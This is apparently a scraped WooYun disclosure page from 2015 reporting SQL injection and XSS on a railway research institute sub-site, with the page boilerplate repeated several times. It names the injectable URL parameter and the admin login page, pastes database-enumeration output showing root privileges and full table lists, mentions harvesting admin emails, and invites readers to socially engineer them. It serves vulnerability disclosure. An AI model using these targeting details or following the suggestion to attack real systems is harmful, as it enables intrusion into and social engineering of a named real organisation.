铁科院某分站300余漏洞大礼包（SQL/XSS) | wooyun-2015-0133297| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133297

漏洞标题：铁科院某分站300余漏洞大礼包（SQL/XSS)

漏洞作者：尊-折戟

提交时间：2015-08-11 12:11

修复时间：2015-09-27 09:34

公开时间：2015-09-27 09:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-11：细节已通知厂商并且等待厂商处理中
2015-08-13：厂商已经确认，细节仅向厂商公开
2015-08-23：细节向核心白帽子及相关领域专家公开
2015-09-02：细节向普通白帽子公开
2015-09-12：细节向实习白帽子公开
2015-09-27：细节向公众公开

简要描述：

头一次看见一个站有这么多漏洞！不过还是要更多关注中国铁路安全！

详细说明：

不知不觉找到的。
URL：

http://www.qts-railway.com.cn

顺便扫了一下发现：

有SQL和XSS漏洞（反射加存储型）这么多漏洞，我会乱说？
还有这网站是有多久没维护了呀！应该也算是很重要的吧。
话不多说，我们继续。。。。
首先从SQL说起吧。。
随便找一个注入点：

http://qts.rails.cn/rqts/infor.jsp?company=1

$~VAFUW_C9~}]YL{)`{}3I(E.jpg$

company参数存在注入。其实还有其余参数存在注入的，太多我就列了一个举例说明！
就此点查看一下管理员权限和数据库信息。。

web application technology: JSP
back-end DBMS: MySQL 5.0
database management system users privileges:                                   
[*] ''@'localhost' [1]:
    privilege: USAGE
[*] ''@'localhost.localdomain' [1]:
    privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'192.168.100.99' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost.localdomain' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

administrator权限,权限操作蛮多的！
7个数据库：

列出表来：

[09:44:58] [INFO] retrieved: "txrec","txrec_branch_a"
[09:44:59] [INFO] retrieved: "txrec","txrec_branch_b"
Database: performance_schema                                                   
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: jeecms_2013_sp1
[74 tables]
+----------------------------------------------+
| jc_acquisition                               |
| jc_acquisition_history                       |
| jc_acquisition_temp                          |
| jc_advertising                               |
| jc_advertising_attr                          |
| jc_advertising_space                         |
| jc_channel                                   |
| jc_channel_attr                              |
| jc_channel_department                        |
| jc_channel_ext                               |
| jc_channel_txt                               |
| jc_channel_user                              |
| jc_chnl_group_contri                         |
| jc_chnl_group_view                           |
| jc_comment                                   |
| jc_comment_ext                               |
| jc_config                                    |
| jc_config_attr                               |
| jc_content                                   |
| jc_content_attachment                        |
| jc_content_attr                              |
| jc_content_channel                           |
| jc_content_check                             |
| jc_content_count                             |
| jc_content_ext                               |
| jc_content_group_view                        |
| jc_content_picture                           |
| jc_content_share_check                       |
| jc_content_tag                               |
| jc_content_topic                             |
| jc_content_txt                               |
| jc_content_type                              |
| jc_contenttag                                |
| jc_department                                |
| jc_file                                      |
| jc_friendlink                                |
| jc_friendlink_ctg                            |
| jc_group                                     |
| jc_guestbook                                 |
| jc_guestbook_ctg                             |
| jc_guestbook_ctg_department                  |
| jc_guestbook_ext                             |
| jc_infor                                     |
| jc_keyword                                   |
| jc_log                                       |
| jc_message                                   |
| jc_model                                     |
| jc_model_item                                |
| jc_receiver_message                          |
| jc_role                                      |
| jc_role_permission                           |
| jc_sensitivity                               |
| jc_site                                      |
| jc_site_attr                                 |
| jc_site_cfg                                  |
| jc_site_flow                                 |
| jc_site_model                                |
| jc_site_txt                                  |
| jc_topic                                     |
| jc_user                                      |
| jc_user_collection                           |
| jc_user_department                           |
| jc_user_ext                                  |
| jc_user_role                                 |
| jc_user_site                                 |
| jc_vote_item                                 |
| jc_vote_record                               |
| jc_vote_topic                                |
| jo_authentication                            |
| jo_config                                    |
| jo_ftp                                       |
| jo_template                                  |
| jo_upload                                    |
| jo_user                                      |
+----------------------------------------------+
Database: jeecms_2012_sp1
[74 tables]
+----------------------------------------------+
| jc_acquisition                               |
| jc_acquisition_history                       |
| jc_acquisition_temp                          |
| jc_advertising                               |
| jc_advertising_attr                          |
| jc_advertising_space                         |
| jc_channel                                   |
| jc_channel_attr                              |
| jc_channel_department                        |
| jc_channel_ext                               |
| jc_channel_txt                               |
| jc_channel_user                              |
| jc_chnl_group_contri                         |
| jc_chnl_group_view                           |
| jc_comment                                   |
| jc_comment_ext                               |
| jc_config                                    |
| jc_config_attr                               |
| jc_content                                   |
| jc_content_attachment                        |
| jc_content_attr                              |
| jc_content_channel                           |
| jc_content_check                             |
| jc_content_count                             |
| jc_content_ext                               |
| jc_content_group_view                        |
| jc_content_picture                           |
| jc_content_share_check                       |
| jc_content_tag                               |
| jc_content_topic                             |
| jc_content_txt                               |
| jc_content_type                              |
| jc_contenttag                                |
| jc_department                                |
| jc_file                                      |
| jc_friendlink                                |
| jc_friendlink_ctg                            |
| jc_group                                     |
| jc_guestbook                                 |
| jc_guestbook_ctg                             |
| jc_guestbook_ctg_department                  |
| jc_guestbook_ext                             |
| jc_infor                                     |
| jc_keyword                                   |
| jc_log                                       |
| jc_message                                   |
| jc_model                                     |
| jc_model_item                                |
| jc_receiver_message                          |
| jc_role                                      |
| jc_role_permission                           |
| jc_sensitivity                               |
| jc_site                                      |
| jc_site_attr                                 |
| jc_site_cfg                                  |
| jc_site_flow                                 |
| jc_site_model                                |
| jc_site_txt                                  |
| jc_topic                                     |
| jc_user                                      |
| jc_user_collection                           |
| jc_user_department                           |
| jc_user_ext                                  |
| jc_user_role                                 |
| jc_user_site                                 |
| jc_vote_item                                 |
| jc_vote_record                               |
| jc_vote_topic                                |
| jo_authentication                            |
| jo_config                                    |
| jo_ftp                                       |
| jo_template                                  |
| jo_upload                                    |
| jo_user                                      |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: txrec
[3 tables]
+----------------------------------------------+
| txrec                                        |
| txrec_branch_a                               |
| txrec_branch_b                               |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+

我就当前数据库找下：

$H~XX}P$__ZUGD5Z_{0EG`O4.png$

得到管理员信息：

得到邮箱号，不过没密码，谁社工好直接社工哈！

漏洞证明：

第二弹：XSS
管理后台存在XSS
后台URL：

http://www.qts-railway.com.cn/admin/login.do

username处存在XSS。
我就列出一个，还有其余的。。
在后台由于只得到uername,于是我尝试弱口令没登录成。也就没继续了！
求rank高点！

修复方案：

你们肯定比我经验丰富！

版权声明：转载请注明来源尊-折戟@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-08-13 09:32

厂商回复：

确认和修复中，谢谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133297

漏洞标题：铁科院某分站300余漏洞大礼包（SQL/XSS)

相关厂商：铁科院

漏洞作者：尊-折戟

提交时间：2015-08-11 12:11

修复时间：2015-09-27 09:34

公开时间：2015-09-27 09:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源尊-折戟@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133297

漏洞标题：铁科院某分站300余漏洞大礼包（SQL/XSS)

相关厂商：铁科院

漏洞作者： 尊-折戟

提交时间：2015-08-11 12:11

修复时间：2015-09-27 09:34

公开时间：2015-09-27 09:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0133297"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 尊-折戟@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：尊-折戟

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源尊-折戟@乌云